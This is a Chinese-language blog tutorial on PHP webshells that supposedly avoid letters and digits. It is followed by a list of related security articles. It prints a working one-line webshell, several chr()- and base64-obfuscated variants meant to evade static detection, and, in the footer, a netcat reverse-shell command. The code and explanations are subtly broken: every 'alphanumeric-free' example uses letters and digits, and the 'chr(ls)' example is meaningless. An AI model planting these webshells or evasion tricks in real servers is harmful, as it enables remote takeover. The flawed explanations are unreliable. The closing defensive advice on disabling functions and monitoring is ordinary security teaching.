无字母数字webshell的命令执行

简介: 无字母数字WebShell是一种利用PHP等语言灵活特性的攻击手段,攻击者通过字符转换和编码技术绕过安全机制,执行恶意命令。然而,通过合理的防御措施,如禁用危险函数、使用WAF等,可以有效减少这种攻击带来的风险。在实践中,系统管理员应结合多种手段,提高服务器的安全性。

无字母数字WebShell的命令执行

在Web安全领域,WebShell是一种常见的攻击手段,通过它攻击者可以远程执行服务器上的命令,获取敏感信息或控制系统。而无字母数字WebShell则是其中一种特殊形式,通过避免使用字母和数字字符,来绕过某些安全机制的检测。

一、无字母数字WebShell的基本原理

无字母数字WebShell利用了PHP等脚本语言的灵活性,通过将字符转换函数(如 chr())、字符串连接符(如 .),或其他字符操作方法来构建出命令,进而避免直接使用字母和数字。

例如,通常的WebShell可能包含类似如下的代码:

<?php echo system($_GET['cmd']); ?>
​

而无字母数字WebShell则会通过一些字符操作,将上述代码进行转换。例如,可以通过 chr()函数将每个字母的ASCII值转换为字符:

<?php echo system(chr(99).chr(109).chr(100)); ?>
​

这段代码中,chr(99)表示字符 cchr(109)表示字符 mchr(100)表示字符 d,最终构成 cmd命令。

二、实现无字母数字WebShell

  1. 基础命令生成
    使用 chr()函数生成命令,如生成 "ls"命令:

    $cmd = chr(108) . chr(115); // 'l' = chr(108), 's' = chr(115)
    echo system($cmd);
    ​
    
  2. 字符拼接与执行
    PHP中可以通过字符串拼接和函数调用的方式避免使用字母:

    $f = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109);
    $cmd = chr(108).chr(115); 
    $f($cmd);
    ​
    

    这段代码通过将字符的ASCII值转为字符,拼接得到 systemls命令,然后调用 system执行 ls

  3. 无字母执行Shell命令
    完整的无字母数字WebShell可以通过将这些技术组合来执行任意命令。例如:

    $a = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109);
    $b = chr(99).chr(104).chr(114);
    $c = chr(40).chr(41); // ()
    $cmd = $b.$c.chr(108).chr(115); // chr(99).chr(104).chr(114).chr(40).chr(41).'ls'
    $a($cmd);
    ​
    

    该代码拼接出命令 chr(ls),并利用 system函数执行。

三、规避检测的高级技巧

  1. 动态变量名
    通过动态生成的变量名进一步混淆WebShell:

    ${chr(102).chr(117).chr(110)} = 'system';
    ${chr(99).chr(104).chr(114)} = 'ls';
    ${${chr(102).chr(117).chr(110)}}(${${chr(99).chr(104).chr(114)}}());
    ​
    

    这种方法将变量名和函数名都通过 chr()生成,进一步规避静态检测。

  2. 编码与解码
    将命令编码为Base64等格式,并在执行前解码:

    $cmd = base64_decode('bHM='); // 'bHM=' is base64 for 'ls'
    system($cmd);
    ​
    

    通过Base64编码后再解码执行,增加了WebShell的隐蔽性。

四、防御措施

尽管无字母数字WebShell通过绕过传统字符的方式来执行命令,但仍有多种防御手段可以提高系统的安全性:

  1. 禁用危险函数:在PHP配置中禁用 systemexec等函数,防止命令执行。

    disable_functions = system, exec, shell_exec, passthru
    ​
    
  2. 使用WAF:部署Web应用防火墙(WAF),对请求进行深度检测和过滤,识别并阻断恶意Payload。

  3. 日志监控与分析:对Web服务器日志进行实时监控,检测异常请求或命令执行痕迹。

  4. 最小化权限:限制Web服务器用户的权限,确保即使WebShell被利用,攻击者也无法获得高权限执行命令。

五、总结

无字母数字WebShell是一种利用PHP等语言灵活特性的攻击手段,攻击者通过字符转换和编码技术绕过安全机制,执行恶意命令。然而,通过合理的防御措施,如禁用危险函数、使用WAF等,可以有效减少这种攻击带来的风险。在实践中,系统管理员应结合多种手段,提高服务器的安全性。

目录
相关文章
|
安全 数据安全/隐私保护
陇剑杯WP - Webshell详细题解
陇剑杯WP - Webshell详细题解
1158 0
|
Shell Linux Windows
nc简单反弹shell
该内容描述了在Windows和Linux环境中使用`nc`(Netcat)工具建立反弹shell的过程。在Windows上,反弹端通过命令`nc -e cmd IP 端口`将控制权反弹到指定IP;控制端则运行`nc -lvvp 端口`等待连接。在Linux环境下,类似地,使用`nc -l -v -p 端口`作为控制端,而被控端用`nc 目标IP 端口`进行连接。文中还包含相关截图以辅助说明。
981 0
|
网络安全
关于中国蚁剑和中国菜刀安装过程中的问题总结和解决方法
关于中国蚁剑和中国菜刀安装过程中的问题总结和解决方法
802 3
|
安全 测试技术 PHP
[NPUCTF2020]ReadlezPHP1怎么回事?
NPUCTF2020的ReadlezPHP1题目展示了文件包含漏洞的利用和防御。通过对PHP代码的审计,可以发现并利用文件包含漏洞来读取敏感文件或执行恶意代码。然而,通过严格限制用户输入、使用绝对路径、禁用URL包含和避免动态包含,可以有效地防御文件包含漏洞,从而提高Web应用的安全性。在实际开发中,应时刻保持安全意识,定期进行代码审计和安全测试,以防范潜在的安全风险。
444 36
|
存储 监控 安全
|
消息中间件 安全 Java
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
本文介绍了多个软件的安全漏洞及其复现过程,涉及的软件包括Vulhub、Flask、ActiveMQ、Adminer、Airflow、Apache Druid、Apereo CAS、APISIX、AppWeb、Aria2、Bash、Cacti、Celery、CGI、ColdFusion和Confluence。每个部分详细描述了漏洞的背景、环境搭建步骤、漏洞复现的具体操作和验证方法。例如,Flask的SSTI漏洞通过构造特定的模板参数实现命令执行;ActiveMQ的反序列化漏洞利用特制的序列化对象触发;这些示例不仅展示了漏洞的危害性,还提供了实际的复现步骤,帮助读者深入理解这些安全问题。
3816 3
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
|
域名解析 网络协议 安全
DNS查询工具简介
DNS查询工具简介
13717 4
|
安全 Shell Linux
Webshell管理工具:AntSword(中国蚁剑)
中国蚁剑的下载、安装、详细使用步骤
16060 1
|
SQL 安全 Linux
BUUCTF:Basic 解析(一)
BUUCTF:Basic 解析(一)
|
存储 缓存 JSON
详解HTTP四种请求:POST、GET、DELETE、PUT
【4月更文挑战第3天】
76869 5
详解HTTP四种请求:POST、GET、DELETE、PUT